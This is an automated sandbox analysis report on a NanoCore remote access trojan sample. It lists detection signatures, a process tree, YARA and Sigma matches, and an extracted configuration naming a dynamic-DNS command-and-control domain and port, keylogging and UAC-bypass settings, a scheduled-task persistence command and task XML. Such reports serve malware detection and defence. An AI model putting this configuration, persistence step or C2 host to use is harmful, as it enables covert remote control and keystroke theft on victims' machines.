Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report qnJXJsqt1M.exe

Overview

General Information

Sample Name:qnJXJsqt1M.exe
Analysis ID:383820
MD5:e98ce8a425d942e7337ecbd309707e25
SHA1:39e794cff61991cbcc073db38bfbf1e496953106
SHA256:34d2073606f34324e1ba7146defa9f69e387059b64d1bfb28a5c9f37b0fc9436
Tags:exeNanoCoreRAT
Infos:

Most interesting Screenshot:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected Nanocore Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: NanoCore
Sigma detected: Scheduled temp file as task from temp location
Yara detected Nanocore RAT
.NET source code contains potential unpacker
Allocates memory in foreign processes
AutoIt script contains suspicious strings
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains strange resources
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • qnJXJsqt1M.exe (PID: 2764 cmdline: 'C:\Users\user\Desktop\qnJXJsqt1M.exe' MD5: E98CE8A425D942E7337ECBD309707E25)
    • MSBuild.exe (PID: 4156 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe MD5: 88BBB7610152B48C2B3879473B17857E)
      • schtasks.exe (PID: 2164 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpC4DF.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • MSBuild.exe (PID: 3544 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe 0 MD5: 88BBB7610152B48C2B3879473B17857E)
    • conhost.exe (PID: 5484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • znytpstdcrwsisx.exe (PID: 3192 cmdline: 'C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exe' MD5: 206B9BA9B804BD72DB71AEBAB5967567)
    • MSBuild.exe (PID: 5796 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe MD5: 88BBB7610152B48C2B3879473B17857E)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "2ad4e32f-c687-4329-b5e5-302ef0e0", "Group": "Default", "Domain1": "nickdns22.duckdns.org", "Domain2": "127.0.0.1", "Port": 1896, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Disable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo />\r\n  <Triggers />\r\n  <Principals>\r\n    <Principal id=\"Author\">\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>4</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Author\">\r\n    <Exec>\r\n      <Command>\"#EXECUTABLEPATH\"</Command>\r\n      <Arguments>$(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task"}

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\znytpstdcrwsisx.fr.urlMethodology_Suspicious_Shortcut_Local_URLDetects local script usage for .URL persistence@itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson)
  • 0x14:$file: URL=file:///
  • 0x0:$url_explicit: [InternetShortcut]
dropped/znytpstdcrwsisx.fr.urlMethodology_Suspicious_Shortcut_Local_URLDetects local script usage for .URL persistence@itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson)
  • 0x14:$file: URL=file:///
  • 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000003.234051628.00000000016D3000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x770d5:$x1: NanoCore.ClientPluginHost
  • 0x77112:$x2: IClientNetworkHost
  • 0x7ac45:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000000.00000003.234051628.00000000016D3000.00000004.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
    00000000.00000003.234051628.00000000016D3000.00000004.00000001.sdmpNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
    • 0x76e3d:$a: NanoCore
    • 0x76e4d:$a: NanoCore
    • 0x77081:$a: NanoCore
    • 0x77095:$a: NanoCore
    • 0x770d5:$a: NanoCore
    • 0x76e9c:$b: ClientPlugin
    • 0x7709e:$b: ClientPlugin
    • 0x770de:$b: ClientPlugin
    • 0x76fc3:$c: ProjectData
    • 0x779ca:$d: DESCrypto
    • 0x7f396:$e: KeepAlive
    • 0x7d384:$g: LogClientMessage
    • 0x7957f:$i: get_Connected
    • 0x77d00:$j: #=q
    • 0x77d30:$j: #=q
    • 0x77d4c:$j: #=q
    • 0x77d7c:$j: #=q
    • 0x77d98:$j: #=q
    • 0x77db4:$j: #=q
    • 0x77de4:$j: #=q
    • 0x77e00:$j: #=q
    0000000B.00000003.271278827.0000000004519000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0xf5ed:$x1: NanoCore.ClientPluginHost
    • 0xf62a:$x2: IClientNetworkHost
    • 0x1315d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    0000000B.00000003.271278827.0000000004519000.00000004.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
      Click to see the 104 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      11.3.znytpstdcrwsisx.exe.11d0fe8.0.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0x1018d:$x1: NanoCore.ClientPluginHost
      • 0x101ca:$x2: IClientNetworkHost
      • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
      11.3.znytpstdcrwsisx.exe.11d0fe8.0.raw.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
      • 0xff05:$x1: NanoCore Client.exe
      • 0x1018d:$x2: NanoCore.ClientPluginHost
      • 0x117c6:$s1: PluginCommand
      • 0x117ba:$s2: FileCommand
      • 0x1266b:$s3: PipeExists
      • 0x18422:$s4: PipeCreated
      • 0x101b7:$s5: IClientLoggingHost
      11.3.znytpstdcrwsisx.exe.11d0fe8.0.raw.unpackJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
        11.3.znytpstdcrwsisx.exe.11d0fe8.0.raw.unpackNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
        • 0xfef5:$a: NanoCore
        • 0xff05:$a: NanoCore
        • 0x10139:$a: NanoCore
        • 0x1014d:$a: NanoCore
        • 0x1018d:$a: NanoCore
        • 0xff54:$b: ClientPlugin
        • 0x10156:$b: ClientPlugin
        • 0x10196:$b: ClientPlugin
        • 0x1007b:$c: ProjectData
        • 0x10a82:$d: DESCrypto
        • 0x1844e:$e: KeepAlive
        • 0x1643c:$g: LogClientMessage
        • 0x12637:$i: get_Connected
        • 0x10db8:$j: #=q
        • 0x10de8:$j: #=q
        • 0x10e04:$j: #=q
        • 0x10e34:$j: #=q
        • 0x10e50:$j: #=q
        • 0x10e6c:$j: #=q
        • 0x10e9c:$j: #=q
        • 0x10eb8:$j: #=q
        12.2.MSBuild.exe.400000.0.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
        • 0x1018d:$x1: NanoCore.ClientPluginHost
        • 0x101ca:$x2: IClientNetworkHost
        • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
        Click to see the 96 entries

        Sigma Overview

        System Summary:

        barindex
        Sigma detected: Drops script at startup locationShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\qnJXJsqt1M.exe, ProcessId: 2764, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\znytpstdcrwsisx.fr.url
        Sigma detected: NanoCoreShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, ProcessId: 4156, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
        Sigma detected: Scheduled temp file as task from temp locationShow sources
        Source: Process startedAuthor: Joe Security: Data: Command: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpC4DF.tmp', CommandLine: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpC4DF.tmp', CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, ParentImage: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, ParentProcessId: 4156, ProcessCommandLine: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpC4DF.tmp', ProcessId: 2164

        Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Antivirus / Scanner detection for submitted sampleShow sources
        Source: qnJXJsqt1M.exeAvira: detected
        Antivirus detection for dropped fileShow sources
        Source: C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exeAvira: detection malicious, Label: DR/AutoIt.Gen8
        Found malware configurationShow sources
        Source: 0000000C.00000002.287551362.0000000004581000.00000004.00000001.sdmpMalware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "2ad4e32f-c687-4329-b5e5-302ef0e0", "Group": "Default", "Domain1": "nickdns22.duckdns.org", "Domain2": "127.0.0.1", "Port": 1896, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Disable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n <RegistrationInfo />\r\n <Triggers />\r\n <Principals>\r\n <Principal id=\"Author\">\r\n <LogonType>InteractiveToken</LogonType>\r\n <RunLevel>HighestAvailable</RunLevel>\r\n </Principal>\r\n </Principals>\r\n <Settings>\r\n <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n <AllowHardTerminate>true</AllowHardTerminate>\r\n <StartWhenAvailable>false</StartWhenAvailable>\r\n <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n <IdleSettings>\r\n <StopOnIdleEnd>false</StopOnIdleEnd>\r\n <RestartOnIdle>false</RestartOnIdle>\r\n </IdleSettings>\r\n <AllowStartOnDemand>true</AllowStartOnDemand>\r\n <Enabled>true</Enabled>\r\n <Hidden>false</Hidden>\r\n <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n <WakeToRun>false</WakeToRun>\r\n <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n <Priority>4</Priority>\r\n </Settings>\r\n <Actions Context=\"Author\">\r\n <Exec>\r\n <Command>\"#EXECUTABLEPATH\"</Command>\r\n <Arguments>$(Arg0)</Arguments>\r\n </Exec>\r\n </Actions>\r\n</Task"}
        Multi AV Scanner detection for domain / URLShow sources
        Source: nickdns22.duckdns.orgVirustotal: Detection: 7%Perma Link
        Source: nickdns22.duckdns.orgVirustotal: Detection: 7%Perma Link
        Multi AV Scanner detection for dropped fileShow sources
        Source: C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exeVirustotal: Detection: 55%Perma Link
        Source: C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exeReversingLabs: Detection: 47%
        Multi AV Scanner detection for submitted fileShow sources
        Source: qnJXJsqt1M.exeVirustotal: Detection: 67%Perma Link
        Source: qnJXJsqt1M.exeMetadefender: Detection: 37%Perma Link
        Source: qnJXJsqt1M.exeReversingLabs: Detection: 79%
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 00000000.00000003.234051628.00000000016D3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000003.271278827.0000000004519000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000003.271444050.00000000044E6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.287551362.0000000004581000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000003.269052958.000000000454C000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.237700588.00000000017A0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.232372398.000000000149D000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.506144635.0000000004237000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.286334104.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000003.271541337.00000000044B3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.507400342.0000000005E00000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000003.268804355.00000000044B3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.232471395.000000000173A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.237121174.00000000017D3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000003.271021731.0000000001204000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.236754982.0000000004671000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.237756346.000000000149D000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000003.268781078.00000000011D1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.287492907.0000000003581000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000003.272077281.000000000118B000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.239247131.000000000176C000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.236584811.00000000016C4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000003.268745620.00000000011D1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000003.274048307.00000000011D1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000003.269076218.000000000126A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000003.268921996.0000000004481000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.234856164.0000000001739000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000003.272132273.00000000011A4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000003.271693708.0000000004481000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.232598333.000000000149D000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.235161139.00000000016F7000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.233676128.000000000176D000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.498286656.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 5796, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: qnJXJsqt1M.exe PID: 2764, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: znytpstdcrwsisx.exe PID: 3192, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 4156, type: MEMORY
        Source: Yara matchFile source: 11.3.znytpstdcrwsisx.exe.11d0fe8.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.3.znytpstdcrwsisx.exe.11d0fe8.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.3.qnJXJsqt1M.exe.17297f8.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.MSBuild.exe.45ceac4.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.MSBuild.exe.45d30ed.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.MSBuild.exe.4239c8e.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.MSBuild.exe.5e00000.9.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.MSBuild.exe.45ceac4.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.3.qnJXJsqt1M.exe.176cb50.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.MSBuild.exe.42430ed.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.3.qnJXJsqt1M.exe.176cb50.9.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.MSBuild.exe.423eac4.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.3.qnJXJsqt1M.exe.176cb50.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.MSBuild.exe.45c9c8e.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.3.qnJXJsqt1M.exe.1739f48.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.MSBuild.exe.423eac4.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.MSBuild.exe.5e04629.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.3.qnJXJsqt1M.exe.1739f48.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.MSBuild.exe.5e00000.9.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.3.qnJXJsqt1M.exe.1739f48.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.3.qnJXJsqt1M.exe.1739f48.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.3.qnJXJsqt1M.exe.16ec7e0.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.3.qnJXJsqt1M.exe.17293d8.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.3.qnJXJsqt1M.exe.17293d8.0.unpack, type: UNPACKEDPE
        Source: 1.2.MSBuild.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 11.2.znytpstdcrwsisx.exe.d50000.0.unpackAvira: Label: DR/AutoIt.Gen8
        Source: 12.2.MSBuild.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 11.0.znytpstdcrwsisx.exe.d50000.0.unpackAvira: Label: DR/AutoIt.Gen8
        Source: 0.2.qnJXJsqt1M.exe.ad0000.0.unpackAvira: Label: DR/AutoIt.Gen8
        Source: 0.0.qnJXJsqt1M.exe.ad0000.0.unpackAvira: Label: DR/AutoIt.Gen8
        Source: 1.2.MSBuild.exe.5e00000.9.unpackAvira: Label: TR/NanoCore.fadte
        Source: qnJXJsqt1M.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
        Source: Binary string: indows\MSBuild.pdbpdbild.pdbs source: MSBuild.exe, 00000001.00000002.501509094.00000000013A6000.00000004.00000040.sdmp
        Source: Binary string: C:\Windows\MSBuild.pdbl source: MSBuild.exe, 00000001.00000002.501509094.00000000013A6000.00000004.00000040.sdmp
        Source: Binary string: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.pdb source: MSBuild.exe, 00000001.00000002.501509094.00000000013A6000.00000004.00000040.sdmp
        Source: Binary string: C:\Windows\exe\MSBuild.pdb source: MSBuild.exe, 00000001.00000002.501509094.00000000013A6000.00000004.00000040.sdmp
        Source: Binary string: f:\dd\vsproject\xmake\XMakeCommandLine\objr\i386\MSBuild.pdb source: MSBuild.exe, 00000001.00000002.501509094.00000000013A6000.00000004.00000040.sdmp
        Source: Binary string: mscorrc.pdb source: MSBuild.exe, 00000001.00000002.507151725.00000000059F0000.00000002.00000001.sdmp
        Source: Binary string: C:\Windows\symbols\exe\MSBuild.pdb source: MSBuild.exe, 00000001.00000002.501509094.00000000013A6000.00000004.00000040.sdmp
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B163F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B16CA9 GetFileAttributesW,FindFirstFileW,FindClose,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B21B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B160DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B1EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B1F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B1F56F FindFirstFileW,FindClose,
        Source: C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exeCode function: 11_2_00D96CA9 GetFileAttributesW,FindFirstFileW,FindClose,

        Networking:

        barindex
        C2 URLs / IPs found in malware configurationShow sources
        Source: Malware configuration extractorURLs: nickdns22.duckdns.org
        Source: Malware configuration extractorURLs: 127.0.0.1
        Uses dynamic DNS servicesShow sources
        Source: unknownDNS query: name: nickdns22.duckdns.org
        Source: Joe Sandbox ViewASN Name: WOWUS WOWUS
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
